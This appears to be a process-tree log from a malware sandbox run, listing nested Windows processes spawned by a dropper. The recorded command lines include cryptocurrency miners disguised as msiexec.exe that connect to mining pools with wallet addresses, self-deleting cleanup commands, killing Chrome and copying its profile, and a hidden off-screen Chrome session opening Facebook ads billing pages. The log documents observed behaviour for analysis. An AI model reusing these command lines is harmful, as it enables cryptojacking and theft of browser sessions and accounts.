C:\Users\Admin\AppData\Local\Temp\QTGTAZLQLS\setups.exe
"C:\Users\Admin\AppData\Local\Temp\QTGTAZLQLS\setups.exe" ll
18⤵
PID:1512

C:\Users\Admin\AppData\Local\Temp\is-JPVCO.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JPVCO.tmp\setups.tmp" /SL5="$60458,454998,229376,C:\Users\Admin\AppData\Local\Temp\QTGTAZLQLS\setups.exe" ll
19⤵
PID:8308

C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\askinstall20.exe"
17⤵
PID:9104

C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\Full Program Features.exe"
17⤵
PID:8716

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
18⤵
PID:7356

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
19⤵
PID:6264

C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
17⤵
PID:8704

C:\Users\Admin\AppData\Roaming\83FD.tmp.exe
"C:\Users\Admin\AppData\Roaming\83FD.tmp.exe"
18⤵
PID:5884

C:\Windows\system32\msiexec.exe
-o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w8584 --cpu-max-threads-hint 50 -r 9999
19⤵
PID:5032

C:\Windows\system32\msiexec.exe
-P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w21213@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
19⤵
PID:9392

C:\Users\Admin\AppData\Roaming\9A84.tmp.exe
"C:\Users\Admin\AppData\Roaming\9A84.tmp.exe"
18⤵
PID:8896

C:\Windows\SysWOW64\cmd.exe
/c timeout /t 3 & del /f /q C:\Users\Admin\AppData\Roaming\9A84.tmp.exe
19⤵
PID:9460

C:\Windows\SysWOW64\timeout.exe
timeout /t 3
20⤵
- Delays execution with timeout.exe
PID:8488

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX4\file.exe"
18⤵
PID:8480

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
19⤵
- Runs ping.exe
PID:6348

C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX4\md2_2efs.exe"
17⤵
PID:2604

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe /8-2222 & exit
15⤵
PID:7712

C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe
C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe /8-2222
16⤵
PID:3888

C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe
"C:\Users\Admin\AppData\Local\Temp\l3skakfu.vea\app.exe" /8-2222
17⤵
PID:6500

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jx3vte0o.a2m\Four.exe & exit
15⤵
PID:8612

C:\Users\Admin\AppData\Local\Temp\jx3vte0o.a2m\Four.exe
C:\Users\Admin\AppData\Local\Temp\jx3vte0o.a2m\Four.exe
16⤵
PID:5540

C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
17⤵
PID:9636

C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe" 1 3.1617574347.606a39cb653ab 104
18⤵
PID:10124

C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\QRQO6QF6IS\multitimer.exe" 2 3.1617574347.606a39cb653ab
19⤵
PID:5556

C:\Users\Admin\AppData\Local\Temp\0qv0rvydfsv\bcl02qyuuhi.exe
"C:\Users\Admin\AppData\Local\Temp\0qv0rvydfsv\bcl02qyuuhi.exe" /ustwo INSTALL
20⤵
PID:6812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "bcl02qyuuhi.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\0qv0rvydfsv\bcl02qyuuhi.exe" & exit
21⤵
PID:11240

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "bcl02qyuuhi.exe" /f
22⤵
- Kills process with taskkill
PID:4316

C:\Users\Admin\AppData\Local\Temp\wmdtamn4ujn\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\wmdtamn4ujn\cpyrix.exe" /VERYSILENT
20⤵
PID:5064

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
21⤵
PID:11060

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
22⤵
PID:10424

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
21⤵
PID:10312

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
22⤵
PID:9060

C:\Users\Admin\AppData\Local\Temp\jai5xj4kraw\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\jai5xj4kraw\Setup3310.exe" /Verysilent /subid=577
20⤵
PID:7912

C:\Users\Admin\AppData\Local\Temp\is-HNQMN.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HNQMN.tmp\Setup3310.tmp" /SL5="$30810,138429,56832,C:\Users\Admin\AppData\Local\Temp\jai5xj4kraw\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:7668

C:\Users\Admin\AppData\Local\Temp\is-VOG2G.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-VOG2G.tmp\Setup.exe" /Verysilent
22⤵
PID:10600

C:\Users\Admin\AppData\Local\Temp\1r5apcj4wjk\app.exe
"C:\Users\Admin\AppData\Local\Temp\1r5apcj4wjk\app.exe" /8-23
20⤵
PID:4748

C:\Users\Admin\AppData\Local\Temp\nsyqkrdkwki\vict.exe
"C:\Users\Admin\AppData\Local\Temp\nsyqkrdkwki\vict.exe" /VERYSILENT /id=535
20⤵
PID:7888

C:\Users\Admin\AppData\Local\Temp\is-RG51V.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RG51V.tmp\vict.tmp" /SL5="$4081E,870426,780800,C:\Users\Admin\AppData\Local\Temp\nsyqkrdkwki\vict.exe" /VERYSILENT /id=535
21⤵
PID:10044

C:\Users\Admin\AppData\Local\Temp\is-MDQ6C.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-MDQ6C.tmp\win1host.exe" 535
22⤵
PID:10472

C:\Users\Admin\AppData\Local\Temp\AUY5G3631T\setups.exe
"C:\Users\Admin\AppData\Local\Temp\AUY5G3631T\setups.exe" ll
17⤵
PID:10156

C:\Users\Admin\AppData\Local\Temp\is-PU72J.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PU72J.tmp\setups.tmp" /SL5="$20786,454998,229376,C:\Users\Admin\AppData\Local\Temp\AUY5G3631T\setups.exe" ll
18⤵
PID:8456

C:\Users\Admin\AppData\Local\Temp\6e-66630-a2d-c85b5-380ba9b3f346f\Nujelawigi.exe
"C:\Users\Admin\AppData\Local\Temp\6e-66630-a2d-c85b5-380ba9b3f346f\Nujelawigi.exe"
14⤵
PID:5856

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 1968
15⤵
PID:5288

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
11⤵
PID:5904

C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe" 0 306065bb10421b26.04333812 0 103
12⤵
PID:7028

C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe" 1 3.1617574036.606a3894811fe 103
13⤵
PID:6604

C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\INOQZEGMY9\multitimer.exe" 2 3.1617574036.606a3894811fe
14⤵
PID:4356

C:\Users\Admin\AppData\Local\Temp\iveqdq310hf\vict.exe
"C:\Users\Admin\AppData\Local\Temp\iveqdq310hf\vict.exe" /VERYSILENT /id=535
15⤵
PID:7256

C:\Users\Admin\AppData\Local\Temp\is-OET1F.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OET1F.tmp\vict.tmp" /SL5="$20578,870426,780800,C:\Users\Admin\AppData\Local\Temp\iveqdq310hf\vict.exe" /VERYSILENT /id=535
16⤵
PID:4272

C:\Users\Admin\AppData\Local\Temp\is-BHDAU.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-BHDAU.tmp\win1host.exe" 535
17⤵
PID:8172

C:\Users\Admin\AppData\Local\Temp\hadaksggtan\app.exe
"C:\Users\Admin\AppData\Local\Temp\hadaksggtan\app.exe" /8-23
15⤵
PID:7352

C:\Users\Admin\AppData\Local\Temp\hadaksggtan\app.exe
"C:\Users\Admin\AppData\Local\Temp\hadaksggtan\app.exe" /8-23
16⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\n20uuv0du33\ghg0gvjqyhq.exe
"C:\Users\Admin\AppData\Local\Temp\n20uuv0du33\ghg0gvjqyhq.exe" /ustwo INSTALL
15⤵
PID:5860

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "ghg0gvjqyhq.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\n20uuv0du33\ghg0gvjqyhq.exe" & exit
16⤵
PID:7996

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "ghg0gvjqyhq.exe" /f
17⤵
- Kills process with taskkill
PID:5172

C:\Users\Admin\AppData\Local\Temp\jw2nwcq4dxn\vpn.exe
"C:\Users\Admin\AppData\Local\Temp\jw2nwcq4dxn\vpn.exe" /silent /subid=482
15⤵
PID:6356

C:\Users\Admin\AppData\Local\Temp\is-OB05P.tmp\vpn.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OB05P.tmp\vpn.tmp" /SL5="$303EE,15170975,270336,C:\Users\Admin\AppData\Local\Temp\jw2nwcq4dxn\vpn.exe" /silent /subid=482
16⤵
PID:7892

C:\Users\Admin\AppData\Local\Temp\nusrq2pjorg\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\nusrq2pjorg\cpyrix.exe" /VERYSILENT
15⤵
PID:7320

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
16⤵
PID:6592

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
17⤵
PID:7468

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
16⤵
PID:7164

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
17⤵
PID:8028

C:\Users\Admin\AppData\Local\Temp\c5hpkdydpxi\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\c5hpkdydpxi\Setup3310.exe" /Verysilent /subid=577
15⤵
PID:8076

C:\Users\Admin\AppData\Local\Temp\is-F2LL4.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-F2LL4.tmp\Setup3310.tmp" /SL5="$303BC,138429,56832,C:\Users\Admin\AppData\Local\Temp\c5hpkdydpxi\Setup3310.exe" /Verysilent /subid=577
16⤵
PID:4668

C:\Users\Admin\AppData\Local\Temp\is-N76FB.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-N76FB.tmp\Setup.exe" /Verysilent
17⤵
PID:416

C:\Users\Admin\AppData\Local\Temp\1XY6E2J57W\setups.exe
"C:\Users\Admin\AppData\Local\Temp\1XY6E2J57W\setups.exe" ll
12⤵
PID:7120

C:\Users\Admin\AppData\Local\Temp\is-BA3BH.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-BA3BH.tmp\setups.tmp" /SL5="$403CE,454998,229376,C:\Users\Admin\AppData\Local\Temp\1XY6E2J57W\setups.exe" ll
13⤵
PID:1816

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\0Jm5LQEyZe9W.exe"
11⤵
PID:5948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
12⤵
PID:6892

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 160
13⤵
- Program crash
PID:6212

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
11⤵
PID:2888

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
11⤵
PID:5864

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
12⤵
PID:6536

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
13⤵
PID:6960

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
11⤵
PID:4596

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
12⤵
PID:6684

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
13⤵
PID:6412

C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe
"C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
11⤵
PID:5520

C:\Users\Admin\AppData\Local\Temp\is-E3MIU.tmp\lylal220.tmp
"C:\Users\Admin\AppData\Local\Temp\is-E3MIU.tmp\lylal220.tmp" /SL5="$A0052,491750,408064,C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lylal220.exe"
12⤵
PID:6160

C:\Users\Admin\AppData\Local\Temp\is-2CSGE.tmp\Microsoft.exe
"C:\Users\Admin\AppData\Local\Temp\is-2CSGE.tmp\Microsoft.exe" /S /UID=lylal220
13⤵
PID:6952

C:\Program Files\Windows Portable Devices\NPDRBYDZXG\irecord.exe
"C:\Program Files\Windows Portable Devices\NPDRBYDZXG\irecord.exe" /VERYSILENT
14⤵
PID:6844

C:\Users\Admin\AppData\Local\Temp\is-V2INC.tmp\irecord.tmp
"C:\Users\Admin\AppData\Local\Temp\is-V2INC.tmp\irecord.tmp" /SL5="$303D6,6265333,408064,C:\Program Files\Windows Portable Devices\NPDRBYDZXG\irecord.exe" /VERYSILENT
15⤵
PID:6108

C:\Users\Admin\AppData\Local\Temp\af-afec3-902-145b0-f3db0c33fd8e4\Tukaevumapo.exe
"C:\Users\Admin\AppData\Local\Temp\af-afec3-902-145b0-f3db0c33fd8e4\Tukaevumapo.exe"
14⤵
PID:5560

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
dw20.exe -x -s 2312
15⤵
PID:6172

C:\Users\Admin\AppData\Local\Temp\d6-bb887-287-bc9b7-815505eed047a\Qoqyxysyra.exe
"C:\Users\Admin\AppData\Local\Temp\d6-bb887-287-bc9b7-815505eed047a\Qoqyxysyra.exe"
14⤵
PID:4868

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\chn25zfc.kbu\md6_6ydj.exe & exit
15⤵
PID:4784

C:\Users\Admin\AppData\Local\Temp\chn25zfc.kbu\md6_6ydj.exe
C:\Users\Admin\AppData\Local\Temp\chn25zfc.kbu\md6_6ydj.exe
16⤵
PID:7708

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\maykpgbe.iiw\askinstall31.exe & exit
15⤵
PID:6172

C:\Users\Admin\AppData\Local\Temp\maykpgbe.iiw\askinstall31.exe
C:\Users\Admin\AppData\Local\Temp\maykpgbe.iiw\askinstall31.exe
16⤵
PID:7828

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
17⤵
PID:8152

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
18⤵
- Kills process with taskkill
PID:7596

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
17⤵
PID:5456

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
17⤵
PID:3800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd8,0xdc,0xe0,0xb4,0xe4,0x7ffa3f846e00,0x7ffa3f846e10,0x7ffa3f846e20
18⤵
PID:8112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1588,15694699899096866948,16596840158157033203,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1600 /prefetch:8
18⤵
PID:7536

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe & exit
15⤵
PID:7008

C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe
16⤵
PID:6808

C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe
C:\Users\Admin\AppData\Local\Temp\0kbsxj0x.ewm\toolspab1.exe
17⤵
PID:8180

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oupbwkew.f0u\GcleanerWW.exe /mixone & exit
15⤵
PID:5608

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\a3fca51p.oxp\setup_10.2_mix.exe & exit
15⤵
PID:6460

C:\Users\Admin\AppData\Local\Temp\a3fca51p.oxp\setup_10.2_mix.exe
C:\Users\Admin\AppData\Local\Temp\a3fca51p.oxp\setup_10.2_mix.exe
16⤵
PID:996

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\o3t4eyqn.bqv\file.exe & exit
15⤵
PID:5500

C:\Users\Admin\AppData\Local\Temp\o3t4eyqn.bqv\file.exe
C:\Users\Admin\AppData\Local\Temp\o3t4eyqn.bqv\file.exe
16⤵
PID:1344

C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\Setup.exe"
17⤵
PID:5804

C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
18⤵
PID:412

C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe" 1 3.1617574266.606a397abf430 101
19⤵
PID:8052

C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe
"C:\Users\Admin\AppData\Local\Temp\RP8HKMS6UV\multitimer.exe" 2 3.1617574266.606a397abf430
20⤵
PID:6392

C:\Users\Admin\AppData\Local\Temp\nqq3bubfat3\xphkqorzc0v.exe
"C:\Users\Admin\AppData\Local\Temp\nqq3bubfat3\xphkqorzc0v.exe" /ustwo INSTALL
21⤵
PID:7396

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "xphkqorzc0v.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\nqq3bubfat3\xphkqorzc0v.exe" & exit
22⤵
PID:10196

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "xphkqorzc0v.exe" /f
23⤵
- Kills process with taskkill
PID:6352

C:\Users\Admin\AppData\Local\Temp\cdzkcvspb1o\cpyrix.exe
"C:\Users\Admin\AppData\Local\Temp\cdzkcvspb1o\cpyrix.exe" /VERYSILENT
21⤵
PID:5592

C:\Users\Admin\AppData\Roaming\2.exe
C:\Users\Admin\AppData\Roaming\2.exe
22⤵
PID:196

C:\Users\Admin\AppData\Roaming\2.exe
"{path}"
23⤵
PID:9244

C:\Users\Admin\AppData\Roaming\1.exe
C:\Users\Admin\AppData\Roaming\1.exe
22⤵
PID:9504

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
23⤵
PID:9556

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
23⤵
PID:10096

C:\Users\Admin\AppData\Roaming\1.exe
"{path}"
23⤵
PID:9600

C:\Users\Admin\AppData\Local\Temp\xqtvy04hqiu\vict.exe
"C:\Users\Admin\AppData\Local\Temp\xqtvy04hqiu\vict.exe" /VERYSILENT /id=535
21⤵
PID:7604

C:\Users\Admin\AppData\Local\Temp\is-M85S9.tmp\vict.tmp
"C:\Users\Admin\AppData\Local\Temp\is-M85S9.tmp\vict.tmp" /SL5="$A069C,870426,780800,C:\Users\Admin\AppData\Local\Temp\xqtvy04hqiu\vict.exe" /VERYSILENT /id=535
22⤵
PID:6580

C:\Users\Admin\AppData\Local\Temp\is-HAQI3.tmp\win1host.exe
"C:\Users\Admin\AppData\Local\Temp\is-HAQI3.tmp\win1host.exe" 535
23⤵
PID:8532

C:\Users\Admin\AppData\Local\Temp\k2ky12mr4gx\Setup3310.exe
"C:\Users\Admin\AppData\Local\Temp\k2ky12mr4gx\Setup3310.exe" /Verysilent /subid=577
21⤵
PID:7504

C:\Users\Admin\AppData\Local\Temp\is-66G1S.tmp\Setup3310.tmp
"C:\Users\Admin\AppData\Local\Temp\is-66G1S.tmp\Setup3310.tmp" /SL5="$304E0,138429,56832,C:\Users\Admin\AppData\Local\Temp\k2ky12mr4gx\Setup3310.exe" /Verysilent /subid=577
22⤵
PID:3736

C:\Users\Admin\AppData\Local\Temp\is-4D51P.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-4D51P.tmp\Setup.exe" /Verysilent
23⤵
PID:9956

C:\Users\Admin\AppData\Local\Temp\je2a15nfl4d\app.exe
"C:\Users\Admin\AppData\Local\Temp\je2a15nfl4d\app.exe" /8-23
21⤵
PID:8836

C:\Users\Admin\AppData\Local\Temp\XHBKLY6O0P\setups.exe
"C:\Users\Admin\AppData\Local\Temp\XHBKLY6O0P\setups.exe" ll
18⤵
PID:2100

C:\Users\Admin\AppData\Local\Temp\is-GCR0K.tmp\setups.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GCR0K.tmp\setups.tmp" /SL5="$B04BC,454998,229376,C:\Users\Admin\AppData\Local\Temp\XHBKLY6O0P\setups.exe" ll
19⤵
PID:5452

C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX3\askinstall20.exe"
17⤵
PID:7084

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
18⤵
PID:8404

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
19⤵
- Kills process with taskkill
PID:9004

C:\Windows\SysWOW64\xcopy.exe
xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
18⤵
PID:7796

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
18⤵
PID:10784

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ffa3f846e00,0x7ffa3f846e10,0x7ffa3f846e20
19⤵
PID:10816

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1752 /prefetch:8
19⤵
PID:8556

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1644 /prefetch:2
19⤵
PID:9080

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2248 /prefetch:8
19⤵
PID:5072

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2872 /prefetch:1
19⤵
PID:8408

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2852 /prefetch:1
19⤵
PID:4376

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1676,4229733645907097826,12475621296103354330,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
19⤵
PID:9256

C:\Program Files\Google\Chrome\Application\chrome.exe
